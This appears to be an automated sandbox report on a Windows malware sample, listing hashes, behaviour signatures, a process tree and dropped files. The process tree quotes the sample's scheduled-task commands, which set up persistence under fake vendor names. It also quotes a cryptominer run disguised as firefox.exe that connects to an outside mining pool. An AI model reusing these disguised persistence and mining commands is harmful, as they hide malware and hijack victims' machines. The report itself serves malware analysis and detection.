Analysis
-
max time kernel
65s -
max time network
100s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
13-05-2021 12:55
General
-
Target
e90981b9b7785da5ad7d0322a45c1cbbc2592aa404ffa51d97b12a950b030589.exe
-
Size
2.6MB
-
MD5
b9778cfed374bca17cb377d2013f7354
-
SHA1
97f509d17326ef9be6392cd103b64b469bef6a68
-
SHA256
e90981b9b7785da5ad7d0322a45c1cbbc2592aa404ffa51d97b12a950b030589
-
SHA512
f5ec5cdccb1658f0ad9c783ae502e42a5af0e43a42201a8cafdfa452266e06d978781fc0aebce332b5acbbab7031bf15b2882497f454502e59e932fae730a6ff
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Modifies Installed Components in the registry 2 TTPs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 16 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 36 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 47 IoCs
-
Suspicious use of WriteProcessMemory 56 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e90981b9b7785da5ad7d0322a45c1cbbc2592aa404ffa51d97b12a950b030589.exe"C:\Users\Admin\AppData\Local\Temp\e90981b9b7785da5ad7d0322a45c1cbbc2592aa404ffa51d97b12a950b030589.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *2⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 18 /TN "Adobe ARM" /TR "\"C:\Program Files\Java\jre7\lib\applet\AdobeARM.exe\""2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 18 /TN "COMODO" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\CLPSLA.exe\""2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 31 /TN "Apple Push" /TR "\"C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\APSDaemon.exe\""2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 21 /TN "AutoUpdate Monitor" /TR "\"C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\almon.exe\""2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Adobe ARM" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\AdobeARM.exe\""2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exeC:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 12 /TN "Adobe ARM" /TR "\"C:\Program Files\Java\jre7\lib\applet\AdobeARM.exe\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 31 /TN "COMODO" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\CLPSLA.exe\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 16 /TN "Apple Push" /TR "\"C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\APSDaemon.exe\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 23 /TN "AutoUpdate Monitor" /TR "\"C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\almon.exe\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Adobe ARM" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\AdobeARM.exe\""3⤵
- Creates scheduled task(s)
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 2 -m5123⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\AdobeARM.exeMD5
0dbd0ffd68b03a897c6ff755c2ae91b2
SHA11c6d2b725ebbe8d06083249556511f92844c1f5b
SHA2568b4e4364f3aa1dce892099cdbb19693f8f06b0dfb53e3e86da900f7e7135e04d
SHA5127fc882589ec9d313f77246f848ad1c986cd0869947f7b91093ce077eeef40cb9da3f825c128ecfb4034505815a5ccf27a7337584fa774b879d1693b21ba18d46
-
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\CLPSLA.exeMD5
40ebed87b0ad02454ee98207642a9cca
SHA1c91bb7676d8c9f0fbece7dd1db910716475a8431
SHA256168915047fa66a3fc02e3929ad2e02bf4208562fc142438e67182798060f71f3
SHA5120fa979e886cd62b4bf33da312b12c8e1a7d5c903aea2131697f811e86fddad9a947a76176d8dac7e1c8fad648dcf3de1f5e11afd6d4e613371a5c9f650301852
-
C:\Program Files\Java\jre7\lib\applet\AdobeARM.exeMD5
14054c0ed50b0bc2ca036927549bc091
SHA1bb89587eb172da1ebe2f5c52fe0aa12257e63aa8
SHA2563152994d6612aebffad3e7b826e59c850ae10d44a96b25723898ff8bcd5ce799
SHA512af37abd96612388fe26ef8fbd665b05c9fd860707a4ca16f5fb796f847e804e5dd103b496679fb3b861538681ac72fcabe6072d2bd68b3c9a0c14c6a5d682af4
-
C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\almon.exeMD5
d93ba84d8f1251c4cbd86741a9e5b1c6
SHA111e6d8900790b24537cbeeb29f7968e9797497e3
SHA25661971fdb81427376ff7458f6597a3d8ab6be50eb8704ae39670158c03a3cc9b8
SHA512dd6a93957d8391b4813345515fcf0eb050a0cc62c2c39b13a9c5f15faac6fb2281f0369c2b38755e60d410b25466ee9a2faf986b1d83440db45784524fd1fe86
-
C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\APSDaemon.exeMD5
a8511cfd452daefd910940a831f463c1
SHA10c54967fea6d65423e13b52585456ef1e0ff18b0
SHA2566c966c03432a6b68161bad62c8d92fa2be0955211e9b05ee5b6b1223d51bbc7c
SHA512e63dd762bb3ac0acd02404ae996e424fc041be2f7627c9bfc5d8088a9c0e591e638392484636ab7d34bd9d4546288bdf429d1cbf2a6986b20d015430fd955748
-
C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\CLPSLA.exeMD5
83c26d7811e31f1f81f6435b0453c764
SHA135f9dd13d0a1780d91cdf42b33d5bb4ac64e2b3d
SHA256b6ececf1ab843d547090398fc879e82a17d64f2d0149efb0383cd2c8d1884e7f
SHA512cd17bd8e139e0dcef8ed15186266af3d0c8266108fb237355c92e1f338febd69a8c824edb881ad0d59b5124de8fe28c2dcda7a984e8f04dbccf03584afb90a94
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\plugin-container.exeMD5
358543e4f30b2e404cd07cfcbeb3bdcf
SHA116b6c6281ad16b29c2ae16548c227ecb5882ecc2
SHA256d835ecf31e5c99eb44536b93b7d3028abffc9e52ac62796e53fb1771ded89b7f
SHA512815945b5d2aa4e303df7dc6fdffef8ab41792587f1a8268ec251cbc5f046c197e210cf539fb53f3397df427bc3191fac47c2d943b4626cf917e8d13bf3a0b766
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exeMD5
e357b6c1f4bf94bef2059393af3c0888
SHA1d998a55c2fdb7dd928acf565017c0688d7320534
SHA256af8378513be1aebcfded181025feae7c3aa9f59d92382fd4767e2c1fc783a301
SHA512278ab01a109435993688db67a84d7dc5b455dd5233b19f7fef708313c32423e2db04ea75499a21ff6757b7985808734cfae892c4dca383cb8692589d3bee8332
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exeMD5
e357b6c1f4bf94bef2059393af3c0888
SHA1d998a55c2fdb7dd928acf565017c0688d7320534
SHA256af8378513be1aebcfded181025feae7c3aa9f59d92382fd4767e2c1fc783a301
SHA512278ab01a109435993688db67a84d7dc5b455dd5233b19f7fef708313c32423e2db04ea75499a21ff6757b7985808734cfae892c4dca383cb8692589d3bee8332
-
\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exeMD5
e357b6c1f4bf94bef2059393af3c0888
SHA1d998a55c2fdb7dd928acf565017c0688d7320534
SHA256af8378513be1aebcfded181025feae7c3aa9f59d92382fd4767e2c1fc783a301
SHA512278ab01a109435993688db67a84d7dc5b455dd5233b19f7fef708313c32423e2db04ea75499a21ff6757b7985808734cfae892c4dca383cb8692589d3bee8332
-
memory/304-67-0x0000000000000000-mapping.dmp
-
memory/324-71-0x0000000000000000-mapping.dmp
-
memory/480-77-0x0000000000000000-mapping.dmp
-
memory/848-85-0x0000000000000000-mapping.dmp
-
memory/916-78-0x0000000000000000-mapping.dmp
-
memory/944-81-0x0000000000000000-mapping.dmp
-
memory/968-69-0x0000000000000000-mapping.dmp
-
memory/1020-68-0x0000000000000000-mapping.dmp
-
memory/1028-60-0x000007FEFB701000-0x000007FEFB703000-memory.dmpFilesize
8KB
-
memory/1028-61-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/1064-79-0x0000000000000000-mapping.dmp
-
memory/1072-83-0x0000000000000000-mapping.dmp
-
memory/1200-63-0x0000000000000000-mapping.dmp
-
memory/1324-64-0x0000000000000000-mapping.dmp
-
memory/1336-87-0x0000000000000000-mapping.dmp
-
memory/1528-66-0x0000000000000000-mapping.dmp
-
memory/1640-89-0x0000000000000000-mapping.dmp
-
memory/1764-62-0x0000000000000000-mapping.dmp
-
memory/1884-65-0x0000000000000000-mapping.dmp
-
memory/2000-91-0x0000000000060000-0x00000000000A7000-memory.dmpFilesize
284KB
-
memory/2000-92-0x000000000006BC40-mapping.dmp
-
memory/2000-93-0x0000000000060000-0x00000000000A7000-memory.dmpFilesize
284KB